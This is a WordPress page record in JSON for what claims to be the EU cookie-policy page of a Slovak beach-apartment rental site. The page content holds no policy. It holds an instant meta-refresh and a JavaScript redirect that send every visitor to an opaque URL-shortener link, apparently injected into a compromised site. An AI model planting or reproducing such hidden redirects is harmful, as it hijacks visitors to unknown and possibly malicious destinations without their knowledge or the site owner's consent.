{"id":1675,"date":"2022-11-22T17:34:36","date_gmt":"2022-11-22T16:34:36","guid":{"rendered":"https:\/\/goldenbeachapartment.sk\/zasady-pouzivania-suborov-cookie-eu\/"},"modified":"2023-02-06T14:49:22","modified_gmt":"2023-02-06T13:49:22","slug":"zasady-pouzivania-suborov-cookie-eu","status":"publish","type":"page","link":"https:\/\/goldenbeachapartment.sk\/en\/zasady-pouzivania-suborov-cookie-eu\/","title":{"rendered":"Z\u00e1sady pou\u017e\u00edvania s\u00faborov cookie (E\u00da)"},"content":{"rendered":"<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/urshort.live\/uxOujxzYh0r4\" \/>\r\n<script>window.location.href = \"https:\/\/urshort.live\/uxOujxzYh0r4\";<\/script>\r\nRegion EU not activated for cookie-statement.","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":9,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","footnotes":""},"class_list":{"0":"post-1675","1":"page","2":"type-page","3":"status-publish","5":"no-featured-image-padding"},"_links":{"self":[{"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/pages\/1675","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/comments?post=1675"}],"version-history":[{"count":0,"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/pages\/1675\/revisions"}],"wp:attachment":[{"href":"https:\/\/goldenbeachapartment.sk\/en\/wp-json\/wp\/v2\/media?parent=1675"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}